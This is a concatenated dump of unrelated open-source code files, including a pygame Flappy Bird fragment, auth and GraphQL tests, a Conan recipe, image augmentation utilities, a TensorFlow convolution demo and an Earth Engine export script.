self.pineUp = pygame.image.load("flappybirdassets/assets/top.png")
self.pineDown = pygame.image.load("flappybirdassets/assets/bottom.png")
def PipelineUpdate(self):
#movement
self.wallx -= 5
if self.wallx < -80:
global score
score += 1
self.wallx = 400
def checkDead():
upRect = pygame.Rect(Pipeline.wallx,-300,Pipeline.pineUp.get_width(),Pipeline.pineUp.get_height())
downRect = pygame.Rect(Pipeline.wallx,500,Pipeline.pineDown.get_width(),Pipeline.pineDown.get_height())
if upRect.colliderect(Bird.birdRect) or downRect.colliderect(Bird.birdRect):
Bird.dead = True
if not Bird.birdRect[1] < height:
Bird.dead = True
return True
else:
return False
def getResult():
final_text1 = "GAME OVER"
final_text2 = "Your final score is :" + str(score)
    ft1_font = pygame.font.SysFont("Arial", 70)
    ft1_surf = ft1_font.render(final_text1, 1, (242, 3, 36))
    ft2_font = pygame.font.SysFont("Arial", 50)
    ft2_surf = ft2_font.render(final_text2, 1, (253, 177, 6))
screen.blit(ft1_surf,[screen.get_width()/2-ft1_surf.get_width()/2,100])
screen.blit(ft2_surf,[screen.get_width()/2-ft2_surf.get_width()/2,200])
pygame.display.update()
if __name__ == '__main__':
pygame.init()
font = pygame.font.SysFont(None,50)
size = width, height = 400,650
    screen = pygame.display.set_mode(size)  # set the window size
    clock = pygame.time.Clock()  # clock used to cap the frame rate
color = (255,255,255)
Bird = Bird()
Pipeline = Pipeline()
score = 0
while True:
clock.tick(60)
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
if (event.type == pygame.MOUSEBUTTONDOWN or event.type == pygame.KEYDOWN) and not Bird.dead :
Bird.jump = True
Bird.gravity = 5
Bird.jumpSpeed = 10
# screen.fill(color)
background = pygame.image.load("flappybirdassets/assets/background.png")
if checkDead():
getResult()
else:
createMap()
pygame.quit()
| 3.265625
| 3
|
spec/rackspace.py
|
jmvrbanac/requests-cloud-auth
| 1
|
12783921
|
from mock import patch
from specter import Spec, expect
from requests_cloud_auth import rackspace
from spec import get_keystone_v2_auth_resp
class AuthenticationToRackspace(Spec):
class PasswordAuthentication(Spec):
def before_all(self):
self.auth = rackspace.RackspacePasswordAuth(
username='tester',
password='password'
)
@patch("requests.post")
def can_authenticate(self, post_func):
post_func.return_value = get_keystone_v2_auth_resp()
creds = self.auth.authenticate()
expect(creds.get('token', None)).to.equal('some_token')
expect(creds.get('project_id', None)).to.equal('some_tenant')
@patch("requests.post")
def can_get_token(self, post_func):
post_func.return_value = get_keystone_v2_auth_resp()
token, tenant = self.auth.get_token()
expect(token).to.equal('some_token')
class ApiKeyAuthentication(Spec):
def before_all(self):
self.auth = rackspace.RackspaceApiKeyAuth(
username='tester',
api_key='api_key'
)
@patch("requests.post")
def can_authenticate(self, post_func):
post_func.return_value = get_keystone_v2_auth_resp()
creds = self.auth.authenticate()
expect(creds.get('token', None)).to.equal('some_token')
expect(creds.get('project_id', None)).to.equal('some_tenant')
@patch("requests.post")
def can_get_token(self, post_func):
post_func.return_value = get_keystone_v2_auth_resp()
token, tenant = self.auth.get_token()
expect(token).to.equal('some_token')
class SupportedRackspaceRegions(Spec):
def can_use_uk_region(self):
self.auth = rackspace.RackspacePasswordAuth(
username='tester',
password='<PASSWORD>',
region='UK'
)
expect(rackspace.UK_ENDPOINT).to.be_in(self.auth.endpoint)
self.auth = rackspace.RackspaceApiKeyAuth(
username='tester',
api_key='some_pass',
region='UK'
)
expect(rackspace.UK_ENDPOINT).to.be_in(self.auth.endpoint)
def can_use_us_region(self):
self.auth = rackspace.RackspacePasswordAuth(
username='tester',
password='<PASSWORD>',
region='US'
)
expect(rackspace.US_ENDPOINT).to.be_in(self.auth.endpoint)
self.auth = rackspace.RackspaceApiKeyAuth(
username='tester',
api_key='some_pass',
region='US'
)
expect(rackspace.US_ENDPOINT).to.be_in(self.auth.endpoint)
| 2.296875
| 2
|
manage.py
|
kongminhao/flask-blueprint-with-docker
| 0
|
12783922
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 17/3/21 5:32 PM
import os
from app import create_app, db
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
manager = Manager(app)
migrate = Migrate(app, db)
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
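
# Typical invocations, assuming the 'app' package from this repo is importable
# ('db' sub-commands come from Flask-Migrate, 'runserver'/'shell' from Flask-Script):
#   python manage.py db init && python manage.py db migrate && python manage.py db upgrade
#   python manage.py runserver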
| 1.90625
| 2
|
src/domaindiscovery/models/response.py
|
whois-api-llc/domain-discovery-py
| 0
|
12783923
|
import copy
import datetime
import re
from .base import BaseModel
import sys
if sys.version_info < (3, 9):
import typing
_re_date_format = re.compile(r'^\d\d\d\d-\d\d-\d\d$')
_re_datetime_format = re.compile(
r'^(\d\d\d\d-\d\d-\d\dT\d\d:\d\d:\d\d)\+(\d\d):(\d\d)$')
def _datetime_value(values: dict, key: str) -> datetime.datetime or None:
if key in values and values[key] is not None:
value = values[key]
match = _re_datetime_format.fullmatch(value)
if match is not None:
(dt, tz_hours, tz_minutes) = match.groups()
value = "{}+{}{}".format(dt, tz_hours, tz_minutes)
return datetime.datetime.strptime(
value, '%Y-%m-%dT%H:%M:%S%z')
return None
def _date_value(values: dict, key: str) -> datetime.date or None:
if key in values and values[key] is not None:
if _re_date_format.match(values[key]) is not None:
return datetime.datetime.strptime(
values[key], '%Y-%m-%d').date()
return None
def _string_value(values: dict, key: str) -> str:
if key in values and values[key]:
return str(values[key])
return ''
def _int_value(values: dict, key: str) -> int:
if key in values and values[key]:
return int(values[key])
return 0
def _list_value(values: dict, key: str) -> list:
if key in values and type(values[key]) is list:
return copy.deepcopy(values[key])
return []
def _timestamp2datetime(timestamp: int) -> datetime.datetime or None:
if timestamp is not None:
return datetime.datetime.fromtimestamp(timestamp)
return None
class Response(BaseModel):
domains_count: int
if sys.version_info < (3, 9):
domains_list: typing.List[str]
else:
        domains_list: list[str]
def __init__(self, values):
super().__init__()
self.domains_count = 0
self.domains_list = []
if values is not None:
self.domains_count = _int_value(values, 'domainsCount')
self.domains_list = _list_value(values, 'domainsList')
class ErrorMessage(BaseModel):
code: int
message: str
def __init__(self, values):
super().__init__()
        self.code = 0
self.message = ''
if values is not None:
self.code = _int_value(values, 'code')
self.message = _string_value(values, 'messages')
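
# Sketch of the payload shapes these models expect (the dicts below are invented
# and only illustrate the keys consumed above):
#   Response({'domainsCount': 1, 'domainsList': ['example.com']})
#     -> .domains_count == 1, .domains_list == ['example.com']
#   ErrorMessage({'code': 403, 'messages': 'Access restricted'})
#     -> .code == 403, .message == 'Access restricted'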
| 2.53125
| 3
|
instance/versions/2425b6924b1c_13migration.py
|
kalister5/pitch
| 0
|
12783924
|
"""13Migration
Revision ID: 2425b<PASSWORD>c
Revises: <PASSWORD>
Create Date: 2018-09-08 18:25:12.151586
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '2<PASSWORD>'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('pitches', sa.Column('title', sa.String(length=255), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('pitches', 'title')
# ### end Alembic commands ###
| 1.507813
| 2
|
lib/datasets/augmentation.py
|
ParikhKadam/HybridPose
| 369
|
12783925
|
import numpy as np
import cv2
import pdb
# https://github.com/zju3dv/clean-pvnet/blob/master/lib/datasets/augmentation.py
def debug_visualize(image, mask, pts2d, sym_cor, name_prefix='debug'):
from random import sample
cv2.imwrite('{}_image.png'.format(name_prefix), image * 255)
cv2.imwrite('{}_mask.png'.format(name_prefix), mask * 255)
img_pts = image.copy() * 255
for i in range(pts2d.shape[0]):
x = int(round(pts2d[i, 0]))
y = int(round(pts2d[i, 1]))
img_pts = cv2.circle(img_pts, (x, y), 2, (0, 0, 255), thickness=-1)
cv2.imwrite('{}_pts.png'.format(name_prefix), img_pts)
img_sym = image.copy() * 255
ys, xs = np.nonzero(mask)
for i_pt in sample([i for i in range(len(ys))], min(100, len(ys))):
y = int(round(ys[i_pt]))
x = int(round(xs[i_pt]))
x_cor, y_cor = sym_cor[y, x]
x_cor = int(round(x + x_cor))
y_cor = int(round(y + y_cor))
img_sym = cv2.line(img_sym, (x, y), (x_cor, y_cor), (0, 0, 255), 1)
cv2.imwrite('{}_sym.png'.format(name_prefix), img_sym)
def rotate_sym_cor(sym_cor, mask, R):
h, w = sym_cor.shape[:2]
ys, xs = np.nonzero(mask)
source = np.float32(np.stack([xs, ys], axis=-1))
delta = np.float32(sym_cor[ys, xs])
target = source + delta
last_col = np.ones((source.shape[0], 1), dtype=np.float32)
source = np.concatenate([source, last_col], axis=-1)
target = np.concatenate([target, last_col], axis=-1)
last_row = np.asarray([[0, 0, 1]], dtype=np.float32)
R = np.concatenate([R, last_row], axis=0).transpose()
source = np.matmul(source, R)[:, :2]
target = np.matmul(target, R)[:, :2]
source = np.uint32(np.round(source))
delta = target - source
# remove invalid indices
xs, ys = source[:, 0], source[:, 1]
valid = (xs > 0) & (xs < w) & (ys > 0) & (ys < h)
xs, ys, delta = xs[valid], ys[valid], delta[valid]
sym_cor = np.zeros_like(sym_cor)
sym_cor[ys, xs] = delta
return sym_cor
def rotate_instance(img, mask, hcoords, sym_cor, rot_ang_min, rot_ang_max):
h, w = img.shape[0], img.shape[1]
degree = np.random.uniform(rot_ang_min, rot_ang_max)
hs, ws = np.nonzero(mask)
R = cv2.getRotationMatrix2D((np.mean(ws), np.mean(hs)), degree, 1)
sym_cor = rotate_sym_cor(sym_cor, mask, R)
mask = cv2.warpAffine(mask, R, (w, h), flags=cv2.INTER_NEAREST, borderMode=cv2.BORDER_CONSTANT, borderValue=0)
img = cv2.warpAffine(img, R, (w, h), flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT, borderValue=0)
last_row = np.asarray([[0, 0, 1]], dtype=np.float32)
R = np.concatenate([R, last_row], axis=0).transpose()
last_col = np.ones((hcoords.shape[0], 1), dtype=np.float32)
hcoords = np.concatenate([hcoords, last_col], axis=1)
hcoords = np.float32(np.matmul(hcoords, R))
hcoords = hcoords[:, :2]
return img, mask, hcoords, sym_cor
def crop_resize_instance_v1(img, mask, hcoords, sym_cor, imheight, imwidth,
overlap_ratio=0.5, ratio_min=0.8, ratio_max=1.2):
'''
crop a region with [imheight*resize_ratio,imwidth*resize_ratio]
which at least overlap with foreground bbox with overlap
'''
hcoords_last_col = np.ones((hcoords.shape[0], 1), dtype=np.float32)
hcoords = np.concatenate([hcoords, hcoords_last_col], axis=1)
resize_ratio = np.random.uniform(ratio_min, ratio_max)
target_height = int(imheight * resize_ratio)
target_width = int(imwidth * resize_ratio)
img, mask, hcoords, sym_cor = crop_or_padding_to_fixed_size_instance(
img, mask, hcoords, sym_cor, target_height, target_width, overlap_ratio)
img = cv2.resize(img, (imwidth, imheight), interpolation=cv2.INTER_LINEAR)
mask = cv2.resize(mask, (imwidth, imheight), interpolation=cv2.INTER_NEAREST)
sym_cor = cv2.resize(sym_cor, (imwidth, imheight), interpolation=cv2.INTER_NEAREST)
sym_cor /= resize_ratio
hcoords[:, 0] = hcoords[:, 0] / resize_ratio
hcoords[:, 1] = hcoords[:, 1] / resize_ratio
hcoords = hcoords[:, :2]
return img, mask, hcoords, sym_cor
def crop_or_padding_to_fixed_size_instance(img, mask, hcoords, sym_cor, th, tw,
overlap_ratio=0.5):
h, w, _ = img.shape
hs, ws = np.nonzero(mask)
hmin, hmax = np.min(hs), np.max(hs)
wmin, wmax = np.min(ws), np.max(ws)
fh, fw = hmax - hmin, wmax - wmin
hpad, wpad = th >= h, tw >= w
hrmax = int(min(hmin + overlap_ratio * fh, h - th)) # h must > target_height else hrmax<0
hrmin = int(max(hmin + overlap_ratio * fh - th, 0))
wrmax = int(min(wmin + overlap_ratio * fw, w - tw)) # w must > target_width else wrmax<0
wrmin = int(max(wmin + overlap_ratio * fw - tw, 0))
hbeg = 0 if (hpad or hrmin == hrmax) else np.random.randint(hrmin, hrmax)
hend = hbeg + th
wbeg = 0 if (wpad or wrmin == wrmax) else np.random.randint(wrmin, wrmax) # if pad then [0,wend] will larger than [0,w], indexing it is safe
wend = wbeg + tw
img = img[hbeg:hend, wbeg:wend]
mask = mask[hbeg:hend, wbeg:wend]
sym_cor = sym_cor[hbeg:hend, wbeg:wend]
hcoords[:, 0] -= wbeg * hcoords[:, 2]
hcoords[:, 1] -= hbeg * hcoords[:, 2]
if hpad or wpad:
nh, nw, _ = img.shape
new_img = np.zeros([th, tw, 3], dtype=img.dtype)
new_mask = np.zeros([th, tw], dtype=mask.dtype)
new_sym_cor = np.zeros([th, tw, 2], dtype=sym_cor.dtype)
hbeg = 0 if not hpad else (th - h) // 2
wbeg = 0 if not wpad else (tw - w) // 2
new_img[hbeg:hbeg + nh, wbeg:wbeg + nw] = img
new_mask[hbeg:hbeg + nh, wbeg:wbeg + nw] = mask
new_sym_cor[hbeg:hbeg + nh, wbeg:wbeg + nw] = sym_cor
hcoords[:, 0] += wbeg * hcoords[:, 2]
hcoords[:, 1] += hbeg * hcoords[:, 2]
img, mask, sym_cor = new_img, new_mask, new_sym_cor
return img, mask, hcoords, sym_cor
def crop_or_padding_to_fixed_size(img, mask, sym_cor, th, tw):
h, w, _ = img.shape
hpad, wpad = th >= h, tw >= w
hbeg = 0 if hpad else np.random.randint(0, h - th)
wbeg = 0 if wpad else np.random.randint(0,
w - tw) # if pad then [0,wend] will larger than [0,w], indexing it is safe
hend = hbeg + th
wend = wbeg + tw
img = img[hbeg:hend, wbeg:wend]
mask = mask[hbeg:hend, wbeg:wend]
sym_cor = sym_cor[hbeg:hend, wbeg:wend]
if hpad or wpad:
nh, nw, _ = img.shape
new_img = np.zeros([th, tw, 3], dtype=img.dtype)
new_mask = np.zeros([th, tw], dtype=mask.dtype)
new_sym_cor = np.zeros([th, tw, 2], dtype=sym_cor.dtype)
hbeg = 0 if not hpad else (th - h) // 2
wbeg = 0 if not wpad else (tw - w) // 2
new_img[hbeg:hbeg + nh, wbeg:wbeg + nw] = img
new_mask[hbeg:hbeg + nh, wbeg:wbeg + nw] = mask
new_sym_cor[hbeg:hbeg + nh, wbeg:wbeg + nw] = sym_cor
img, mask, sym_cor = new_img, new_mask, new_sym_cor
return img, mask, sym_cor
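
# Minimal sanity-check sketch for the augmentations above. The image, mask,
# keypoints and symmetry map are synthetic and only illustrate the expected
# shapes; they are not taken from any dataset.
if __name__ == '__main__':
    _img = np.random.rand(128, 128, 3).astype(np.float32)
    _mask = np.zeros((128, 128), dtype=np.uint8)
    _mask[40:90, 50:100] = 1                     # rectangular foreground blob
    _sym = np.zeros((128, 128, 2), dtype=np.float32)
    _pts = np.float32([[60., 50.], [90., 80.]])  # two 2D keypoints (x, y)
    _img2, _mask2, _pts2, _sym2 = rotate_instance(
        _img, _mask, _pts, _sym, rot_ang_min=-30, rot_ang_max=30)
    print(_img2.shape, int(_mask2.sum()), _pts2)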
| 2.734375
| 3
|
recipes/nsimd/2.x/conanfile.py
|
rockandsalt/conan-center-index
| 562
|
12783926
|
import os
from conans import ConanFile, CMake, tools
required_conan_version = ">=1.33.0"
class NsimdConan(ConanFile):
name = "nsimd"
homepage = "https://github.com/agenium-scale/nsimd"
description = "Agenium Scale vectorization library for CPUs and GPUs"
topics = ("hpc", "neon", "cuda", "avx", "simd", "avx2", "sse2", "aarch64", "avx512", "sse42", "rocm", "sve", "neon128")
url = "https://github.com/conan-io/conan-center-index"
license = "MIT"
exports_sources = ["CMakeLists.txt", "patches/*"]
generators = "cmake"
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False],
        # This is used only when building the library.
# Most functionality is header only.
"simd": [None, "cpu", "sse2", "sse42", "avx", "avx2", "avx512_knl", "avx512_skylake", "neon128", "aarch64", "sve", "sve128", "sve256", "sve512", "sve1024", "sve2048", "cuda", "rocm"]
}
default_options = {
"shared": False,
"fPIC": True,
"simd": None
}
_cmake = None
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
# Most of the library is header only.
# cpp files do not use STL.
del self.settings.compiler.libcxx
def source(self):
tools.get(**self.conan_data["sources"][self.version], strip_root=True, destination=self._source_subfolder)
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
if self.options.simd:
self._cmake.definitions["simd"] = self.options.simd
if self.settings.arch == "armv7hf":
self._cmake.definitions["NSIMD_ARM32_IS_ARMEL"] = False
self._cmake.definitions["CMAKE_POSITION_INDEPENDENT_CODE"] = self.options.get_safe("fPIC", True)
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def _patch_sources(self):
cmakefile_path = os.path.join(self._source_subfolder, "CMakeLists.txt")
tools.replace_in_file(cmakefile_path,
" SHARED ",
" ")
tools.replace_in_file(cmakefile_path,
"RUNTIME DESTINATION lib",
"RUNTIME DESTINATION bin")
tools.replace_in_file(cmakefile_path,
"set_property(TARGET ${o} PROPERTY POSITION_INDEPENDENT_CODE ON)",
"")
def build(self):
self._patch_sources()
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
| 1.882813
| 2
|
5_Pham_Ngo_Tien_Dung/1.1.py
|
huong-rose/student-practices
| 0
|
12783927
|
<reponame>huong-rose/student-practices
# Write a program that prints ‘Hello World’ to the screen.
print("hello world!")
| 3.3125
| 3
|
tests/api/serializers.py
|
quangvinh1225/drf-generators
| 0
|
12783928
|
from rest_framework.serializers import ModelSerializer
from api.models import Category, Post
class CategorySerializer(ModelSerializer):
class Meta:
model = Category
class PostSerializer(ModelSerializer):
class Meta:
model = Post
| 1.921875
| 2
|
ramp-utils/ramp_utils/testing.py
|
frcaud/ramp-board
| 13
|
12783929
|
<reponame>frcaud/ramp-board<filename>ramp-utils/ramp_utils/testing.py<gh_stars>10-100
import os
HERE = os.path.dirname(__file__)
def database_config_template():
"""Return the path a template database configuration file.
Returns
-------
filename : str
The database configuration filename.
"""
return os.path.join(HERE, "template", "database_config.yml")
def ramp_config_template():
"""Return the path a template RAMP configuration file.
Returns
-------
filename : str
The RAMP configuration filename.
"""
return os.path.join(HERE, "template", "ramp_config.yml")
def ramp_aws_config_template():
"""Return the path a template RAMP configuration AWS file.
Returns
-------
filename : str
        The RAMP AWS configuration filename.
"""
return os.path.join(HERE, "template", "ramp_config_aws.yml")
| 2.21875
| 2
|
tests/functional/regressions/test_issue87.py
|
matt-koevort/tartiflette
| 530
|
12783930
|
import pytest
@pytest.mark.asyncio
@pytest.mark.ttftt_engine
@pytest.mark.parametrize(
"query,errors",
[
(
"""
subscription Sub {
newDog {
name
}
newHuman {
name
}
}
""",
[
{
"message": "Subcription Sub must select only one top level field.",
"path": None,
"locations": [
{"line": 2, "column": 13},
{"line": 2, "column": 30},
],
"extensions": {
"rule": "5.2.3.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Single-root-field",
"tag": "single-root-field",
},
}
],
),
(
"""
subscription Sub {
newDog {
name
}
__typename
}
""",
[
{
"message": "Subcription Sub must select only one top level field.",
"path": None,
"locations": [
{"line": 2, "column": 13},
{"line": 2, "column": 30},
],
"extensions": {
"rule": "5.2.3.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Single-root-field",
"tag": "single-root-field",
},
}
],
),
(
"""
fragment MultipleSubscriptionsFields on Subscription {
newDog {
name
}
newHuman {
name
}
}
subscription Sub {
...MultipleSubscriptionsFields
}
""",
[
{
"message": "Subcription Sub must select only one top level field.",
"path": None,
"locations": [
{"line": 11, "column": 13},
{"line": 2, "column": 66},
],
"extensions": {
"rule": "5.2.3.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Single-root-field",
"tag": "single-root-field",
},
}
],
),
(
"""
subscription Sub {
... on Subscription {
newDog {
name
}
newHuman {
name
}
}
}
""",
[
{
"message": "Subcription Sub must select only one top level field.",
"path": None,
"locations": [
{"line": 2, "column": 13},
{"line": 3, "column": 35},
],
"extensions": {
"rule": "5.2.3.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Single-root-field",
"tag": "single-root-field",
},
}
],
),
(
"""
fragment MultipleSubscriptionsFields on Subscription {
... on Subscription {
newDog {
name
}
newHuman {
name
}
}
}
subscription Sub {
...MultipleSubscriptionsFields
}
""",
[
{
"message": "Subcription Sub must select only one top level field.",
"path": None,
"locations": [
{"line": 13, "column": 13},
{"line": 3, "column": 35},
],
"extensions": {
"rule": "5.2.3.1",
"spec": "June 2018",
"details": "https://graphql.github.io/graphql-spec/June2018/#sec-Single-root-field",
"tag": "single-root-field",
},
}
],
),
],
)
async def test_issue87(engine, query, errors):
assert await engine.execute(query) == {"data": None, "errors": errors}
| 2.046875
| 2
|
src/my/kadenze/lesson1/ConvolutionTF.py
|
AlfredNeverKog/BrainCarya
| 0
|
12783931
|
<reponame>AlfredNeverKog/BrainCarya
import tensorflow as tf
import numpy as np
import math
import matplotlib.pyplot as plt
from PIL import Image
"""
a = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[2, 3], name='a')
b = tf.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], shape=[3, 2], name='b')
c = tf.matmul(a, b)
# Creates a session with log_device_placement set to True.
sess = tf.Session(config=tf.ConfigProto(log_device_placement=True))
# Runs the op.
print (sess.run(c))
"""
def reshape_image_and_save(location, img_format):
image = Image.open("%s.%s"%(location, img_format))
im_array = np.array(image)
mMax = min(im_array.shape[:2])
reshaped = im_array[:mMax,:mMax,:]
Image.fromarray(reshaped).save("%s_reshaped.%s"%(location, img_format))
print(mMax)
#reshape_image_and_save('./data/she','png')
sess = tf.InteractiveSession()
image = Image.open('./data/she_reshaped.png')
#plt.imshow(np.array(image)[:,:,0], cmap='gray')
#plt.show()
im_with_one_chanel = np.array(image)[:, :, 0]
im_arr = tf.constant(im_with_one_chanel.squeeze(), dtype=tf.float32)
#Kernel
x_1d = tf.linspace(-3., 3., 30)
z_1d = tf.contrib.distributions.Normal(mu=0.0, sigma=1.0).pdf(x_1d)
z_size = x_1d.get_shape().as_list()[0]
z_2d = tf.matmul(tf.reshape(z_1d,[z_size,1]),tf.reshape(z_1d,[1,z_size]))
plt.figure(1)
plt.imshow(z_2d.eval())
plt.figure(2)
plt.plot(x_1d.eval(),z_1d.eval())
tf.initialize_all_variables()
z_size = x_1d.get_shape().as_list()[0]
#Convert to 4 dimensions
z_4d = tf.reshape(z_2d, [z_size, z_size, 1, 1])
image4d = tf.reshape(im_arr,[1,im_arr.get_shape().as_list()[0],
im_arr.get_shape().as_list()[0],1])
convolved = tf.nn.conv2d(image4d, z_4d, strides=[1,1,1,1], padding='SAME')
print(z_4d.eval())
conv = convolved.eval().squeeze()
#normalize
conv = conv/float(conv.max()) * 255.0
print(conv)
plt.figure(3)
plt.imshow(conv,cmap='gray')
plt.show()
#plt.imshow(image,cmap='gray')
| 2.578125
| 3
|
tcorr_image/tcorr_export_default_from_daily.py
|
USGS-ET/ssebop-gee-beta
| 28
|
12783932
|
import argparse
from builtins import input
import datetime
import logging
import pprint
import sys
import ee
import openet.ssebop as ssebop
import utils
# from . import utils
def main(ini_path=None, overwrite_flag=False, delay_time=0, gee_key_file=None,
max_ready=-1):
"""Compute default Tcorr image asset
Parameters
----------
ini_path : str
Input file path.
overwrite_flag : bool, optional
If True, overwrite existing files (the default is False).
delay_time : float, optional
Delay time in seconds between starting export tasks (or checking the
number of queued tasks, see "max_ready" parameter). The default is 0.
gee_key_file : str, None, optional
Earth Engine service account JSON key file (the default is None).
max_ready: int, optional
Maximum number of queued "READY" tasks. The default is -1 which is
implies no limit to the number of tasks that will be submitted.
"""
logging.info('\nCompute default Tcorr image asset')
ini = utils.read_ini(ini_path)
model_name = 'SSEBOP'
# model_name = ini['INPUTS']['et_model'].upper()
tmax_name = ini[model_name]['tmax_source']
export_id_fmt = 'tcorr_image_{product}_default'
tcorr_daily_coll_id = '{}/{}_daily'.format(
ini['EXPORT']['export_coll'], tmax_name.lower())
tcorr_default_img_id = '{}/{}_default'.format(
ini['EXPORT']['export_coll'], tmax_name.lower())
try:
tcorr_default = ini[model_name]['tcorr_default']
except:
tcorr_default = 0.978
if (tmax_name.upper() == 'CIMIS' and
ini['INPUTS']['end_date'] < '2003-10-01'):
logging.error(
'\nCIMIS is not currently available before 2003-10-01, exiting\n')
sys.exit()
elif (tmax_name.upper() == 'DAYMET' and
ini['INPUTS']['end_date'] > '2018-12-31'):
logging.warning(
'\nDAYMET is not currently available past 2018-12-31, '
'using median Tmax values\n')
# sys.exit()
# elif (tmax_name.upper() == 'TOPOWX' and
# ini['INPUTS']['end_date'] > '2017-12-31'):
# logging.warning(
# '\nDAYMET is not currently available past 2017-12-31, '
# 'using median Tmax values\n')
# # sys.exit()
logging.info('\nInitializing Earth Engine')
if gee_key_file:
logging.info(' Using service account key file: {}'.format(gee_key_file))
# The "EE_ACCOUNT" parameter is not used if the key file is valid
ee.Initialize(ee.ServiceAccountCredentials('x', key_file=gee_key_file))
else:
ee.Initialize()
logging.debug('\nTmax properties')
tmax_source = tmax_name.split('_', 1)[0]
tmax_version = tmax_name.split('_', 1)[1]
# tmax_coll_id = 'projects/earthengine-legacy/assets/' \
# 'projects/usgs-ssebop/tmax/{}'.format(tmax_name.lower())
# tmax_coll = ee.ImageCollection(tmax_coll_id)
# tmax_mask = ee.Image(tmax_coll.first()).select([0]).multiply(0)
# logging.debug(' Collection: {}'.format(tmax_coll_id))
logging.debug(' Source: {}'.format(tmax_source))
logging.debug(' Version: {}'.format(tmax_version))
# Get the Tcorr daily image collection properties
logging.debug('\nTcorr Image properties')
tcorr_img = ee.Image(ee.ImageCollection(tcorr_daily_coll_id).first())
tcorr_info = utils.get_info(ee.Image(tcorr_img))
tcorr_geo = tcorr_info['bands'][0]['crs_transform']
tcorr_crs = tcorr_info['bands'][0]['crs']
tcorr_shape = tcorr_info['bands'][0]['dimensions']
# tcorr_geo = ee.Image(tcorr_img).projection().getInfo()['transform']
# tcorr_crs = ee.Image(tcorr_img).projection().getInfo()['crs']
# tcorr_shape = ee.Image(tcorr_img).getInfo()['bands'][0]['dimensions']
tcorr_extent = [tcorr_geo[2], tcorr_geo[5] + tcorr_shape[1] * tcorr_geo[4],
tcorr_geo[2] + tcorr_shape[0] * tcorr_geo[0], tcorr_geo[5]]
logging.debug(' Shape: {}'.format(tcorr_shape))
logging.debug(' Extent: {}'.format(tcorr_extent))
logging.debug(' Geo: {}'.format(tcorr_geo))
logging.debug(' CRS: {}'.format(tcorr_crs))
# Get current running tasks
tasks = utils.get_ee_tasks()
if logging.getLogger().getEffectiveLevel() == logging.DEBUG:
logging.debug(' Tasks: {}\n'.format(len(tasks)))
input('ENTER')
# # Limit by year
# try:
# year_list = sorted(list(utils.parse_int_set(ini['TCORR']['years'])))
# except:
# logging.info('\nTCORR "years" parameter not set in the INI,'
# '\n Defaulting to all available years\n')
# year_list = []
export_id = export_id_fmt.format(product=tmax_name.lower())
logging.info(' Export ID: {}'.format(export_id))
logging.info(' Asset ID: {}'.format(tcorr_default_img_id))
if overwrite_flag:
if export_id in tasks.keys():
logging.debug(' Task already submitted, cancelling')
ee.data.cancelTask(tasks[export_id]['id'])
# This is intentionally not an "elif" so that a task can be
# cancelled and an existing image/file/asset can be removed
if ee.data.getInfo(tcorr_default_img_id):
logging.debug(' Asset already exists, removing')
ee.data.deleteAsset(tcorr_default_img_id)
else:
if export_id in tasks.keys():
logging.debug(' Task already submitted, exiting')
return False
elif ee.data.getInfo(tcorr_default_img_id):
logging.debug(' Asset already exists, exiting')
return False
tcorr_daily_coll = ee.ImageCollection(tcorr_daily_coll_id)
output_img = tcorr_daily_coll.mosaic().multiply(0).add(tcorr_default)\
.updateMask(1).rename(['tcorr'])\
.set({
# 'system:time_start': utils.millis(iter_start_dt),
'date_ingested': datetime.datetime.today().strftime('%Y-%m-%d'),
'model_name': model_name,
'model_version': ssebop.__version__,
'tmax_source': tmax_source.upper(),
'tmax_version': tmax_version.upper(),
})
logging.debug(' Building export task')
task = ee.batch.Export.image.toAsset(
image=ee.Image(output_img),
description=export_id,
assetId=tcorr_default_img_id,
crs=tcorr_crs,
crsTransform='[' + ','.join(list(map(str, tcorr_geo))) + ']',
dimensions='{0}x{1}'.format(*tcorr_shape),
)
logging.debug(' Starting export task')
utils.ee_task_start(task)
# Pause before starting the next export task
utils.delay_task(delay_time, max_ready)
logging.debug('')
def arg_parse():
""""""
parser = argparse.ArgumentParser(
description='Compute/export default Tcorr image asset',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'-i', '--ini', type=utils.arg_valid_file,
help='Input file', metavar='FILE')
parser.add_argument(
'--delay', default=0, type=float,
help='Delay (in seconds) between each export tasks')
parser.add_argument(
'--key', type=utils.arg_valid_file, metavar='FILE',
help='JSON key file')
parser.add_argument(
'--ready', default=-1, type=int,
help='Maximum number of queued READY tasks')
parser.add_argument(
'-o', '--overwrite', default=False, action='store_true',
help='Force overwrite of existing files')
parser.add_argument(
'-d', '--debug', default=logging.INFO, const=logging.DEBUG,
help='Debug level logging', action='store_const', dest='loglevel')
args = parser.parse_args()
# Prompt user to select an INI file if not set at command line
# if not args.ini:
# args.ini = utils.get_ini_path(os.getcwd())
return args
